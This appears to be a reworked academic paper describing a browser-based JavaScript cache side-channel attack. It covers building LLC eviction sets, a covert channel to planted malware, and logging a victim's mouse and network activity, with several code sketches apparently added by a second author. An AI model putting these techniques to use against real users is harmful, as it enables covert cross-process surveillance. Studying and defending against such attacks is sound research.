## Abstract
We present the first micro-architectural side-channel attack that runs entirely in the browser. Unlike other work in this area, the attack does not require the attacker to install any software on the victim's machine; the victim merely needs to open a malicious web page controlled by the attacker. This attack model is scalable, easy to mount, and well matched to today's web environment, particularly because most desktop browsers currently connected to the Internet are vulnerable to it and essentially undefended. Building on the LLC attack of Yarom et al. [23], the attack lets a remote adversary learn information belonging to other processes, other users, and even other virtual machines, as long as they run on the same physical host as the victim's browser. We explain the rationale behind the attack, validate it with a high-bandwidth covert channel, and finally use it to build a system-wide mouse and network activity logger. Defending against this attack is possible, but the necessary countermeasures exact an impractical cost on the benign use of browsers and computers.
## 1 Introduction
Side-channel analysis is a remarkably powerful class of cryptanalytic attack. It lets attackers extract secret information by analyzing the physical signals (power, radiation, heat, etc.) that a secure device emits while performing secure computations [15]. Reportedly used by intelligence services as early as World War II, it was first discussed in an academic context by Kocher et al. in 1996 [14]. Side-channel analysis has been shown to break numerous real-world systems, from car alarms to high-security cryptographic coprocessors [8] [18]. The cache attack is the form of side-channel attack most relevant to personal computers: it leaks information because the cache is shared among different processes and users.
Although the power of side-channel attacks is beyond doubt, their applicability to real systems has been relatively limited. A major factor limiting their feasibility is the restrictive attack model they assume: with the exception of network-based timing attacks, most side-channel attacks require the attacker to be in close physical proximity to the victim. Cache attacks additionally assume that the attacker can execute arbitrary binary code on the victim's machine. While this assumption holds for IaaS or PaaS environments such as Amazon's cloud platform, it is far less reasonable elsewhere.
In this report we challenge this restrictive security assumption with a far less constrained and more practical attacker model. In our model, the victim only has to visit a web page owned by the attacker. We show that even under such a simple attacker model, an attacker can still extract meaningful information from the targeted system within a practical amount of time. To match this computational setting, we focus on tracking user behavior rather than extracting cryptographic keys. The attack model of this report is therefore highly practical: it is practical in its assumptions about and limitations on the attacker, practical in its running time, and practical in the benefit it delivers to the attacker. To the best of our knowledge, this is the first side-channel attack that can readily scale to millions of targets.
We assume that the victim uses a personal computer equipped with a recent Intel CPU, and further assume that the victim browses the web with an HTML5-capable browser. This covers the vast majority of PCs connected to the Internet, as shown in Section 5.1. The victim is lured to a page containing an element controlled by the attacker, such as an advertisement. The attack code itself carries out a JavaScript-based cache attack, described in Section 2, which continuously probes the LLC of the system under attack. Because all CPU cores, users, processes, and protection rings share this single cache, the attack can give the attacker detailed knowledge about the user and the attacked system.
### 1.1 Modern Intel CPU memory architecture

Modern computer systems usually combine a fast central processing unit (CPU) with a large but slower random access memory (RAM). To bridge the performance gap between the two, modern systems use caches: smaller but faster memory structures that hold a subset of the RAM contents recently accessed by the CPU. Caches are usually organized as a hierarchy of levels between the CPU and RAM, each level larger and slower than the one before it. Figure 1, taken from [22], shows the cache structure of Intel Ivy Bridge, with a small level-1 (L1) cache, a larger level-2 (L2) cache, and finally the largest level-3 (L3) cache, which sits at the bottom and connects to the RAM. The newer Haswell generation of Intel CPUs adds an embedded DRAM (eDRAM) design, which is beyond the scope of this article. If data the CPU wants to access is not currently in the cache, a cache miss occurs, and an item currently in the cache must be evicted to make room for the new element.
Figure 1: The Intel Ivy Bridge cache structure
Intel's cache micro-architecture is inclusive: all data stored in the L1 cache must also be present in the L2 and L3 caches. Conversely, if an element is evicted from the L3 cache, it is immediately removed from the L2 and L1 caches as well. Note that AMD's cache micro-architecture is not inclusive, so the method described in this article cannot be applied to that platform directly.
This article focuses on the level-3 cache, commonly referred to as the LLC. Because the LLC is large, it would be inefficient for the CPU to search its entire contents on every memory access. To avoid this, the LLC is divided into cache sets, each covering a fixed subset of the memory space. Each cache set contains several cache lines. For example, the Core i7-3720QM, a member of Intel's Ivy Bridge family, has 8192 = 2^13 cache sets, each with 12 cache lines of 64 = 2^6 bytes, for a total cache size of 8192 x 12 x 64 = 6 MB. When the CPU needs to check whether a given physical address is present in the L3 cache, it first computes the cache set and then only checks the cache lines within that set. Consequently, a cache miss on a physical address causes the eviction of one of only a few cache lines sharing its cache set, a fact our attack uses repeatedly. The mapping from 64-bit physical addresses to 13-bit cache set indices was reverse engineered by Hund et al. in 2013 [12]. Of the 64 physical address bits, bits 5 to 0 are ignored, bits 16 to 6 are used directly as the lower 11 bits of the set index, and bits 63 to 17 are hashed to form the upper 2 bits of the set index. The LLC is shared by all cores, threads, processes, users, and even virtual machines running on the same CPU chip, regardless of privilege rings or other similar protection mechanisms.
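To make the bit layout concrete, the following is a small illustrative sketch (ours, not from the paper) that extracts the directly determined part of the set index from a physical address; the hash that produces the upper 2 bits is not modeled:

```javascript
// Illustrative only: split a 64-bit physical address (as a BigInt) into the
// fields described above. Bits 5..0 select the byte within the 64-byte cache
// line, bits 16..6 give the lower 11 bits of the 13-bit set index, and bits
// 63..17 are hashed (by a function we do not model here) into the top 2 bits.
function partialSetIndex(physicalAddress) {
  var lineOffset = physicalAddress & 0x3Fn;           // bits 5..0
  var lowSetBits = (physicalAddress >> 6n) & 0x7FFn;  // bits 16..6
  return { lineOffset: lineOffset, lowSetBits: lowSetBits };
}

// Example: addresses that differ only in bits 63..17 can still collide in the
// same cache set if the hashed upper bits happen to match.
console.log(partialSetIndex(0x1ABCDE40n));
```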
Modern personal computers use virtual memory, so user processes generally cannot observe or directly access the system's physical memory. Instead, each process is assigned virtual memory pages. When a virtual page is accessed by the currently executing process, the operating system dynamically assigns it a page frame in physical memory. The CPU's memory management unit (MMU) is responsible for translating the virtual addresses accessed by the various processes into physical memory addresses. On Intel processors the page and page-frame size is typically 4 KB, and pages and page frames are page-aligned: the start address of each page is a multiple of the page size. This means that the lower 12 bits of any virtual address are identical to the lower 12 bits of the corresponding physical address, a fact that our attack also exploits.
### 1.2 Cache attacks

Cache attacks are a typical example of attacks on the micro-architecture. In his excellent survey, Acıiçmez defines such attacks as exploiting "processor structures that lie below the boundary of the trust architecture" to recover secret information from secure systems. Cache attacks rest on the fact that, despite upper-level security mechanisms such as sandboxing, virtual memory, privilege rings, and hypervisors, secure and insecure processes can still affect one another through their shared use of the cache. By constructing a "spy" process, an attacker can measure and perturb the internal state of other, secure processes through the shared cache. This was first identified by Hu in 1992 [11], and subsequent work has shown that cache-based side-channel attacks can recover AES keys [17] [4] and RSA keys [19], and can even allow one virtual machine to compromise another running on the same host.
Our attack is based on the prime+probe method, first described by Osvik et al. in [17] for the L1 cache and later extended by Yarom et al. in [23] to the LLC on systems with large memory pages enabled. We extend this approach further to the more common case of 4K pages. In general, prime+probe consists of four steps. In the first step, the attacker creates one or more eviction sets. An eviction set is a sequence of memory addresses that all map to the same cache set as an address used by the victim process, so accessing them occupies the cache lines the victim would use. In the second step, the attacker primes the cache set by accessing the eviction set. This evicts the victim's code or data from the cache set and puts the set into a known state. In the third step, the attacker triggers, or simply waits for, the victim to execute and possibly use the cache set. Finally, the attacker probes the cache set by accessing the eviction set again. A low access latency means the attacker's code or data is still in the cache, while a high access latency means the victim's code used the cache set, teaching the attacker something about the victim's internal state. The actual timing measurement is made with the unprivileged assembly instruction RDTSC, which returns a very precise processor cycle count. Traversing the eviction set serves a second purpose as well: it forces the cache set back into a state controlled by the attacker, ready for the next round of measurements.
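To make the four steps concrete, here is a minimal JavaScript sketch of one prime+probe round over an eviction set stored as a linked list inside a typed array (our own illustration under assumed helper names, not the paper's code; a real attack would replace the busy-wait with waiting for, or triggering, the victim):

```javascript
// Walk the linked list stored in `view` starting at `startOffset`. Each 32-bit
// entry holds the byte offset of the next entry, so the traversal defeats the
// CPU's prefetcher, as recommended in [20].
function traverseEvictionSet(view, startOffset) {
  var current = startOffset;
  do {
    current = view.getUint32(current);
  } while (current !== startOffset);
}

// One prime+probe round: prime the cache set, give the victim a chance to run,
// then time a second traversal. A slow probe means the victim touched the set;
// the probe itself also re-primes the set for the next round.
function primeProbeRound(view, startOffset, waitMs) {
  traverseEvictionSet(view, startOffset);        // prime
  var deadline = performance.now() + waitMs;     // wait for victim activity
  while (performance.now() < deadline) { /* busy-wait */ }
  var t0 = performance.now();                    // probe
  traverseEvictionSet(view, startOffset);
  return performance.now() - t0;                 // high value => set was used
}
```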
### 1.3 Web runtime environment

JavaScript is a dynamically typed, object-based scripting language with runtime evaluation that powers the client side of the modern web. JavaScript code is delivered to the browser as source code and is compiled and optimized by the browser's just-in-time (JIT) compilation machinery. Thanks to fierce competition among browser vendors, JavaScript performance has improved continuously, and in some scenarios its execution efficiency now rivals that of native code.
The core features of the JavaScript language are defined in the ECMA-262 standard maintained by the Ecma industry association. The language standard is complemented by a large set of APIs defined by the World Wide Web Consortium (W3C), which make it suitable for developing web content. The set of JavaScript APIs is constantly evolving, and browser vendors add support for new APIs according to their own development roadmaps. Two particular APIs are used in our work: the first is the Typed Arrays specification, which allows efficient access to unstructured binary data; the second is the High Resolution Time API, which lets an application measure time at sub-millisecond granularity. As shown in Section 5.1, most of today's mainstream browsers support both APIs.
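The following minimal example (ours, not from the paper) shows the two ingredients in isolation: a typed-array view over a raw buffer for fast unstructured memory access, and performance.now() for sub-millisecond timing:

```javascript
// A DataView over an ArrayBuffer gives byte-addressable access to raw memory
// owned by the script, and performance.now() returns a timestamp in
// (fractional) milliseconds.
var buffer = new ArrayBuffer(8 * 1024 * 1024);   // 8 MB backing store
var view = new DataView(buffer);

var start = performance.now();
var value = view.getUint32(0);                   // a single memory access
var elapsed = performance.now() - start;         // sub-millisecond granularity
console.log("access took", elapsed, "ms, read", value);
```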
JavaScript code runs in a tightly sandboxed environment and has very limited access to the system. For example, JavaScript code cannot open or read files without the user's permission, and it cannot execute native code or load native libraries. Most notably, JavaScript has no notion of pointers, so not even the virtual address of a JavaScript variable can be determined.
### 1.4 Our contribution

Our goal is to build an LLC attack that can be deployed over the web. This is challenging because JavaScript code cannot load shared libraries or run native programs, and because it must use scripting-language functions for timing instead of invoking special assembly instructions directly. Despite these challenges, we have successfully extended cache attacks to the web environment:
We present a novel method for creating non-canonical eviction sets over the LLC. Unlike [23], our method does not require the system to be configured for large memory pages, so it applies immediately to a wide range of desktop and server systems. We show that, even though it is implemented in JavaScript, the method still completes within a practical amount of time.
We present a fully functional way to mount an LLC attack from unprivileged JavaScript. We evaluate its performance using covert channels, both between different processes on the same machine and between a virtual machine and its host. The JavaScript-based channel is comparable to the native-code channel of [23] and reaches speeds of hundreds of kilobits per second.
We show how the cache-based approach can be used to effectively track user behavior. This application of cache attacks is far more relevant to our attack model than the cryptanalytic applications explored in other work.
Finally, we analyze possible countermeasures against the attack and their system-wide cost.
Document structure: Section 2 covers the design and implementation of each stage of the attack. Section 3 validates the method's performance using a covert channel built on top of it. Section 4 shows how the cache attack can be used to track user behavior both inside and outside the browser. Section 5 concludes, proposes countermeasures, and discusses open research challenges.
## 2 Attack method
As described earlier, a successful prime+probe attack consists of several steps: building eviction sets for one or more relevant cache sets, priming the cache, triggering the victim's operation, and finally probing the cache sets again. While priming and probing are straightforward to implement, it is far less straightforward to find a cache set that corresponds to an operation of the system and to build an eviction set for it. This chapter describes how these steps are carried out in JavaScript.
### 2.1 Creating an eviction set

#### 2.1.1 Design

As described in [23], the first step of the prime+probe attack is to create an eviction set for a cache set shared with the victim process. The eviction set consists of a series of variables that the CPU all maps to the same cache set. Following the recommendation of [20], we use a linked list to defeat the CPU's memory prefetching and pipelining optimizations. We first show how to create an eviction set for an arbitrary cache set, and then address the problem of finding a cache set shared with the victim.
As noted in [17], the L1 cache determines set placement based on the low bits of the virtual address. Assuming the attacker knows the virtual addresses of its variables, building an eviction set is easy in an attack model targeting the L1 cache. In the LLC, however, set placement is based on physical memory addresses, which unprivileged processes generally cannot learn. To get around this, the authors of [23] assume the system uses large pages, in which case the lower 21 bits of the physical and virtual addresses coincide, and the upper bits of the set index are recovered by an iterative algorithm.
In the attack model we consider, the system runs with the 4K page size, so only the lowest 12 bits of the physical and virtual addresses coincide. The bigger problem, however, is that JavaScript has no notion of pointers, so even for variables it defines itself, the virtual addresses are unknown.
The mapping from 64-bit physical addresses to 13-bit cache set indices was studied by Hund et al. [12]. They found that accessing a physically contiguous 8 MB "eviction buffer" invalidates all cache sets in the L3 cache. Although we have no way to allocate such an eviction buffer from user mode (in fact, [12] does so through a kernel-mode driver), we used JavaScript to allocate an 8 MB array in virtual memory (which is actually backed by a collection of random, non-contiguous 4K physical pages allocated by the system) and measured the system-wide effect of traversing this buffer. We found that the access latency of other, unrelated variables increases significantly when they are accessed immediately after iterating over this eviction buffer. We also found that the effect persists even if only one address out of every 64 bytes is accessed, instead of the entire buffer. However, the mapping from the 131K offsets we accessed to the 8192 possible cache sets was not immediately clear, because we did not know the physical address of each page in the buffer.
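A minimal sketch of this experiment (ours), assuming only the standard Typed Array API, might look as follows:

```javascript
// Allocate an "eviction buffer" of 8 MB in virtual memory and touch it once
// every 64 bytes (one access per cache line). After this sweep, unrelated
// variables become measurably slower to access, showing that the sweep pushed
// them out of the LLC.
var evictionBuffer = new DataView(new ArrayBuffer(8 * 1024 * 1024));

function sweepEvictionBuffer() {
  var sum = 0;
  for (var offset = 0; offset < evictionBuffer.byteLength; offset += 64) {
    sum += evictionBuffer.getUint32(offset);     // one access per cache line
  }
  return sum;  // returning the sum keeps the JIT from removing the loop
}
```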
A naive way to solve this problem is to take an arbitrary "victim" address in memory and brute-force search the 131K offsets for the 12 addresses that share its cache set. To do so, we can pick a subset of the 131K offsets, iterate over all offsets in the subset, and then measure whether the access latency of the victim address has changed. If the latency increases, the subset contains the 12 addresses sharing the victim's cache set; if it does not change, none of those 12 addresses is in the subset and the victim address is still cached. Repeating this process 8192 times, each time with a different victim address, would let us identify every cache set and build our own data structure for it.
A procedure built this way would run for a very long time. Fortunately, the page-frame structure enforced by the Intel MMU (Section 1.1) comes to our aid: because virtual addresses are page-aligned, the lower 12 bits of every virtual address match the lower 12 bits of its physical address, and according to Hund et al., 6 of these 12 bits take part in uniquely determining the cache set index. Therefore an offset in the eviction buffer shares these set-index bits with only 8K other offsets, rather than with all 131K. Moreover, once a single cache set is found, the locations of the other 63 cache sets in the same page frame are known immediately. In addition, when JavaScript allocates a large data buffer, it is aligned to a page-frame boundary, which allows us to use the greedy procedure shown in Algorithm 1.
Algorithm 1: Profiling a cache set

Let S be the set of unmapped pages, and let address x be an arbitrary page-aligned address in memory.

1. Repeat k times:
   (a) Iteratively access all members of S.
   (b) Measure T1, the time it takes to access x.
   (c) Select a random page s from S and remove it.
   (d) Iteratively access all members of S \ s.
   (e) Measure T2, the time it takes to access x.
   (f) If removing page s caused the memory access to speed up considerably (i.e., T1 − T2 > thres), then this page is part of the same set as x. Place it back into S.
   (g) If removing page s did not cause the memory access to speed up considerably, then this page is not part of the same set as x.
2. If |S| = 12, return S. Otherwise report failure.
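For reference, a minimal JavaScript rendering of Algorithm 1 might look as follows (our sketch; accessAll, timeAccess, and THRES are assumed helpers built from the primitives shown in Listing 1, and a practical implementation would also handle measurement noise and retries):

```javascript
// Sketch of Algorithm 1. S is an array of page-aligned byte offsets into the
// eviction buffer; x is an arbitrary page-aligned offset to profile.
// accessAll(view, offsets) touches every offset, timeAccess(view, x) returns
// the latency of a single access to x, and THRES is a machine-dependent
// latency threshold.
function profileCacheSet(view, S, x, k, THRES) {
  for (var i = 0; i < k; i++) {
    accessAll(view, S);                      // (a) prime with all of S
    var t1 = timeAccess(view, x);            // (b) time an access to x
    var j = Math.floor(Math.random() * S.length);
    var s = S.splice(j, 1)[0];               // (c) remove a random page s
    accessAll(view, S);                      // (d) prime with S \ {s}
    var t2 = timeAccess(view, x);            // (e) time an access to x again
    if (t1 - t2 > THRES) {
      S.push(s);                             // (f) s conflicts with x: keep it
    }                                        // (g) otherwise leave s out
  }
  return S.length === 12 ? S : null;         // expect one full 12-way set
}
```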
By running Algorithm 1 repeatedly, we can gradually build eviction sets covering most of the cache, except for the cache sets used by the JavaScript runtime itself. Note that, unlike the eviction sets built by the algorithm of [23], ours are non-canonical: because JavaScript has no notion of pointers, once we find an eviction set we have no way of knowing which cache set of the CPU it corresponds to. Furthermore, each run of the algorithm on the same machine yields a different mapping. This is probably a consequence of using the traditional 4K page size rather than 2MB large pages, and it occurs even when the algorithm is implemented in native code rather than JavaScript.
#### 2.1.2 Verification

We implemented Algorithm 1 in JavaScript and verified it on machines with Sandy Bridge, Ivy Bridge, and Haswell CPUs, running Safari and Firefox on Mac OS Yosemite and Ubuntu 14.04 LTS. The systems were not configured to use large pages and used the default 4K page size. Listing 1 shows the code implementing steps 1(d) and 1(e) of Algorithm 1, illustrating how the linked list is traversed and timed in JavaScript. Running the algorithm under Chrome and Internet Explorer requires a few additional steps, described in Section 5.1.
Listing 1
```javascript
// Invalidate the cache set
var currentEntry = startAddress;
do {
    currentEntry = probeView.getUint32(currentEntry);
} while (currentEntry != startAddress);

// Measure access time
var startTime = window.performance.now();
currentEntry = primeView.getUint32(variableToAccess);
var endTime = window.performance.now();
```
Figure 2: Cumulative performance of the profiling algorithm
Figure 2 shows the results of running the profiling algorithm on an Intel i7-3720QM CPU with Firefox 35.0.1 on Mac OS 10.10.2. We were pleased to find that more than 25% of the cache sets were mapped within 30 seconds and about 50% within one minute. The algorithm lends itself well to parallelization, since most of its execution time is spent maintaining the data structure and only a small fraction on invalidating the cache and measuring. The entire algorithm fits in less than 500 lines of JavaScript code.
Figure 3: Probability distribution of access latencies for the two access types on Haswell
To verify that our algorithm can actually distinguish cache sets, we designed an experiment comparing the access latency of a variable before and after it is flushed. Figure 3 shows the probability distribution functions of the two kinds of accesses: grey is the access time of variables flushed out of the cache by our method, and black is the access time of variables residing in the cache. The times were measured with JavaScript's high-resolution timer, so they include the latency of the JavaScript runtime as well. The difference between the two distributions is clear. Figure 4 shows the results captured on an older Sandy Bridge CPU, which has 16 ways per cache set.
By selecting a group of cache sets and continuously measuring their access latencies, an attacker obtains a very detailed picture of real-time cache activity. We call this visual presentation a "memory spectrum", because it closely resembles an acoustic spectrogram.
Figure 4: Probability distribution of access latencies for the two access types on Sandy Bridge

Figure 5: Example memory spectrum

Figure 5 shows a memory spectrum captured over a period of about 400 ms. The X axis corresponds to time and the Y axis to different cache sets. The time resolution in this example is 250 microseconds, and a total of 128 cache sets are monitored. The intensity of each point represents the access latency of that cache set at that time: black indicates low latency, meaning no other process accessed the cache set since the previous measurement, while white indicates that the attacker's data was evicted since the previous measurement.
A closer look at this memory spectrum reveals several immediate observations. First, even though JavaScript timers are used instead of machine-language instructions, the measurement jitter is small, and active and inactive cache sets are easy to tell apart. Several vertical line segments are clearly visible, meaning multiple adjacent cache sets were accessed within the same time interval. Since consecutive cache sets correspond to consecutive physical memory addresses, we believe such a signal indicates code or data whose footprint spans more than 64 bytes. Other cache sets, clustered together, were accessed at the same time as well; we surmise these represent variable accesses. Finally, the horizontal white line indicates a variable that is accessed continuously; it may belong to our measurement code or to the JavaScript runtime itself. It is remarkable that so much information can be obtained from an unprivileged web page.
### 2.2 Identifying cache sets of interest

Profiling the cache allows the attacker to monitor the activity of any cache set. Because the eviction sets we obtain are non-canonical, the attacker must find a way to associate the profiled cache sets with the addresses of the victim's data or code. This learning/classification problem was addressed by Zhang et al. and Yarom et al. in [25] and [23], respectively, using various machine-learning algorithms such as SVM to find patterns in the cache latency measurements.
To bootstrap the learning process effectively, the attacker needs to induce the victim to perform an action and then examine which cache sets that action touched, as detailed in Algorithm 2.
Algorithm 2: Identifying the cache sets associated with an interesting operation

Let Si be the data structure matched to eviction set i.

1. For each set i:
   (a) Iteratively access all members of Si to prime the cache set.
   (b) Measure the time it takes to iteratively access all members of Si.
   (c) Perform an interesting operation.
   (d) Measure once more the time it takes to iteratively access all members of Si.
   (e) If performing the interesting operation caused the access time to slow down considerably, then the operation was associated with cache set i.
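A direct JavaScript rendering of Algorithm 2 might look like the following sketch (ours; accessAll, timeAll, and THRES are assumed helpers built from the primitives of Section 2.1, and interestingOperation stands for whatever action the attacker can trigger):

```javascript
// Sketch of Algorithm 2: find which profiled cache sets respond to a given
// operation. evictionSets[i] holds the eviction set matched to cache set i.
function identifyInterestingSets(view, evictionSets, interestingOperation, THRES) {
  var interesting = [];
  for (var i = 0; i < evictionSets.length; i++) {
    accessAll(view, evictionSets[i]);            // (a) prime cache set i
    var t1 = timeAll(view, evictionSets[i]);     // (b) baseline probe time
    interestingOperation();                      // (c) e.g. issue a request
    var t2 = timeAll(view, evictionSets[i]);     // (d) probe again
    if (t2 - t1 > THRES) {
      interesting.push(i);                       // (e) the operation used set i
    }
  }
  return interesting;
}
```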
Because JavaScript operates under a series of permission restrictions, implementing step (c) is challenging. By contrast, Apecechea et al. could trigger a minimal kernel operation simply by issuing an empty sysenter call. To carry out this step we had to survey the JavaScript runtime for functions that trigger interesting behavior, such as file access, network access, or memory allocation. We were also interested in functions with a relatively short running time that leave no residue behind, since residual objects may later trigger garbage collection and disturb the measurement of step (d). Ho et al. identified several such functions in [10]. Another approach is to induce the user to perform a specific action on the attacker's behalf (for example, pressing a key on the keyboard). The learning process in this case may be structured (the attacker knows when the victim is about to act) or unstructured (the attacker can only assume that a slowdown of the system during some period was caused by the victim's action). Both approaches are used, as detailed in Section 4.
Because our program always detects activity generated by the JavaScript runtime itself, such as the code behind the high-resolution timer and other browser components unrelated to the current call, in practice we find the relevant cache sets by calling two similar functions and comparing the results of their respective activity profiles.
## 3 A cache-based covert channel in JavaScript
### 3.1 Motivation

As shown in [23], LLC access patterns can be used to build a high-bandwidth covert channel and efficiently exfiltrate sensitive information between two virtual machines running on the same host. In our attack model the attacker's code does not run in a co-resident virtual machine but in a web page, so the motivation for a covert channel is different, but no less interesting.
As motivation, suppose some security agency is on the trail of a crime boss named Bob. The agency has installed a piece of malware, an APT (Advanced Persistent Threat), on Bob's personal computer via a phishing campaign. The APT is designed to record evidence of Bob's crimes and send it to the agency's covert server. Bob, however, is very vigilant and runs an operating system with mandatory information flow tracking [24] enabled. This operating system feature prevents the APT from connecting to the network after it has accessed files that may contain the user's private data.
In this setting, as long as Bob can be lured into visiting a web page controlled by the agency, the agency can immediately make use of the JavaScript-based cache attack. The APT can use the cache-based side channel to communicate with the malicious website, so the user's private data never has to travel over the network, and the operating system's information flow tracking is never triggered.
This case study was inspired by the "RF retro-reflector" design attributed to a security agency, in which a bugging device (for example, a microphone) does not transmit the captured signal directly, but instead modulates it onto a carrier signal beamed at it by an external collection device.
#### 3.1.1 Design

Our covert channel design has two requirements. First, the transmitter should be kept simple; in particular, we do not want it to implement the eviction-set algorithm of Section 2.1. Second, because the receiver's eviction sets are non-canonical, the design should make it simple for the receiver to search for the cache sets onto which the transmitter's signal is modulated.
To satisfy these requirements, our transmitter (the APT) allocates a 4K array in its own memory and continuously encodes the data it has collected as a memory access pattern over this array. The 4K array covers 64 cache sets, so the APT can transmit 64 bits in each time period. To make sure the memory accesses can be located by the receiver, the same access pattern is applied repeatedly to several copies of the array. As a result, a large part of the cache is exercised, in contrast to the method of [23], which uses canonical eviction sets and therefore activates only two cache lines.
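To illustrate the encoding, here is a sketch of one transmitted frame (ours, written in JavaScript for consistency with the rest of the listings even though the paper's transmitter is native code; the bit-per-cache-line layout is an assumption):

```javascript
// Encode 64 bits into a memory access pattern. bits is an array of 64 zeroes
// and ones, one per cache set covered by a 4 KB page. For each page-aligned
// copy of the array, line i is touched only when bits[i] is set, so the
// receiver sees those cache sets as active and the others as quiet during
// this time period.
function transmitFrame(view, bits, copies) {
  for (var copy = 0; copy < copies; copy++) {
    var pageBase = copy * 4096;
    for (var i = 0; i < 64; i++) {
      if (bits[i]) {
        view.getUint32(pageBase + i * 64);   // touch line i  => bit i is 1
      }                                      // skip line i   => bit i is 0
    }
  }
}
```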
The receiver code profiles the system's memory and then searches for the page frames containing the data modulated by the APT. The actual data is demodulated from the memory access pattern and sent back to the server; the whole process never violates the operating system's information-flow-tracking protection.
#### 3.1.2 Evaluation

To evaluate our attack model, we assume the transmitter is written in (relatively fast) native code while the receiver is written in JavaScript. We therefore assume that the factor limiting overall system performance is the sampling speed of the malicious web page.
To evaluate the bandwidth of the covert channel, we wrote a small program that traverses the system's memory in a predetermined pattern (a bitmap spelling the word "Usenix"). We then used the JavaScript cache attack to search for this access pattern and measured the maximum frequency the JavaScript code could achieve.
Figure 6: Host-to-host covert channel
The memory spectrum shown in Figure 6 captures an execution of this covert channel. We measured the theoretical bandwidth of the covert channel at about 320 kbps, which compares well with the 1.2 Mbps cross-virtual-machine covert channel implemented in native code in [23].
Figure 7: Host-to-virtual-machine covert channel

The memory spectrum of the host-to-virtual-machine covert channel is similar, except that the receiver code runs not on the same host but inside a virtual machine (Firefox 34 on Ubuntu 14.01, under VMware Fusion 7.1.0). Although the peak bandwidth in this scenario is only about 8 kbps, it is remarkable that a web page running inside a virtual machine can probe the underlying hardware at all.
## 4 Tracking user behavior using cache attacks
Most research on cache attacks assumes that the attacker and the victim share a machine in a cloud provider's data center. Such machines are generally not configured to accept interactive input, so most work in this area focuses on recovering cryptographic keys or other secret state, such as the state of a random number generator [26]. This paper instead investigates how cache attacks can be used to track user behavior, which is far more relevant to our attack model. We note that [20] attempted to track keystroke events using fine-grained measurements of system load on the CPU's L1 cache.
This case study demonstrates how a malicious website can use a cache attack to track a user's activity. In the attacks shown next, we assume the user has the malicious page open in a background tab or window while performing sensitive operations in another tab, or in another application that has no network connection at all.
We chose to focus on mouse activity and network activity because the operating system code that handles them is non-trivial; we therefore expected these operations to leave a relatively large footprint in the cache. As described below, they can also be triggered easily from within JavaScript's heavily restricted security model.
### 4.1 Attack structure

The two attacks share a similar structure. First comes a profiling phase, in which the attacker probes each cache set from JavaScript. Then, in the training phase, the activity to be detected (network activity or mouse movement) is triggered while the cache is sampled at high resolution. In our training phase, the measurement script triggers the network activity directly (by issuing a network request), while the mouse activity is generated by continuously wiggling the mouse over the web page.
By comparing cache activity during the idle and busy periods of the training phase, the attacker learns which cache sets are activated by the user action and trains a classifier on those sets. Finally, in the classification phase, the attacker continuously monitors these interesting cache sets to follow the user's activity.
We use a very basic unstructured training process: we assume that the activity we measure during training is the dominant activity performed by the system. To exploit this, we compute the Hamming weight of each measurement over time (that is, the number of cache sets active in a given period) and cluster the measurements with the k-means algorithm. We then compute the mean access latency of each cache set within each cluster, yielding the center of each cluster. When we encounter an unknown measurement vector, we compute its Euclidean distance to each center and classify it into the nearest class.
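The classification step then reduces to a nearest-centroid decision, sketched below (ours; centroids are the cluster centers learned with k-means during training):

```javascript
// Assign a new measurement vector (one latency value per monitored cache set)
// to the nearest centroid by Euclidean distance and return that class index.
function classify(measurement, centroids) {
  var best = -1, bestDistance = Infinity;
  for (var c = 0; c < centroids.length; c++) {
    var distance = 0;
    for (var i = 0; i < measurement.length; i++) {
      var diff = measurement[i] - centroids[c][i];
      distance += diff * diff;               // squared Euclidean distance
    }
    if (distance < bestDistance) {
      bestDistance = distance;
      best = c;
    }
  }
  return best;
}
```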
In the classification phase, we used the command-line tool wget to generate network traffic and moved the mouse outside the browser window. To obtain ground truth for network activity, we also captured the system's traffic with tcpdump and correlated the timestamps recorded by tcpdump with those detected by the classifier. To obtain ground truth for mouse activity, we wrote a page that records all mouse events together with their timestamps. Note that the page recording mouse activity ran not in the browser executing the measurement code (Firefox) but in a different browser (Chrome).
### 4.2 Verification

Figure 8: Detected network activity. Figure 9: Detected mouse activity.
The results of the activity measurements are shown in Figures 8 and 9. The top of each figure shows the real-time activity of a subset of the cache sets; the bottom shows the classifier's output together with the externally collected ground truth. As the figures show, even our extremely simple classifier is very effective at identifying mouse and network activity. More advanced training and classification techniques would no doubt improve the attack further. Note that the mouse-activity detector does not respond to network activity, and vice versa.
The classifier's measurement rate is only 500 Hz, so it cannot count individual packets; it can only indicate whether a period was active or idle. On the other hand, the code detecting mouse activity registered more events than the code recording the ground truth, because the Chrome browser limits the rate of mouse events to about 60 Hz.
Chen et al. showed in a well-known paper [5] that monitoring network activity can serve as the foundation for deeply mining user behavior. While Chen et al. assume that the attacker can monitor all of the victim's inbound and outbound traffic at the network layer, the technique shown here essentially lets a malicious website monitor the network activity of users browsing it at the same time. The attack could be strengthened with additional measurements, such as memory allocation (see [13]), DOM layout events, disk writes, and so on.
## 5 Conclusion
This paper shows that the reach of side-channel attacks is far greater than previously assumed. The attacks presented here can target most machines connected to the Internet and are not limited to specific attack scenarios. The sudden exposure of so many systems to side-channel attacks means that side-channel-resistant algorithms and systems should be deployed broadly, not only in selected cases.
### 5.1 Prevalence of vulnerable systems

Our attack requires a personal computer with an Intel CPU of the Sandy Bridge, Ivy Bridge, Haswell, or Broadwell micro-architecture. According to IDC, 80% of PCs sold since 2011 satisfy this requirement. We further assume the browser in use supports the HTML5 High Resolution Time and Typed Arrays specifications. Table 1 lists, for each major browser, the earliest version supporting these APIs (and therefore vulnerable), together with its share of worldwide Internet traffic according to the StatCounter GlobalStats report for January 2015. As the table shows, roughly 80% of the browsers in use today cannot resist this attack.
Table 1: Browser support for the required APIs and worldwide prevalence

| Browser | High Resolution Time support | Typed Arrays support | Worldwide prevalence |
|---|---|---|---|
| Internet Explorer | 10 | 11 | 11.77% |
| Safari | 8 | 6 | 1.86% |
| Chrome | 20 | 7 | 50% |
| Firefox | 15 | 4 | 17.67% |
| Opera | 15 | 12.1 | 1.2% |
| Total | - | - | 83.03% |
The effectiveness of the attack depends on how accurately time can be measured with the JavaScript High Resolution Time API. Although the W3C specification defines the unit of high-resolution time as milliseconds accurate to a thousandth of a millisecond, it does not mandate a maximum resolution, and the actual resolution varies between browsers and operating systems. For example, during our tests we found that Safari on Mac OS offers nanosecond accuracy, while Internet Explorer on Windows offers only 0.8 microseconds. Chrome, on the other hand, provided a uniform resolution of 1 microsecond on all the operating systems we tested.
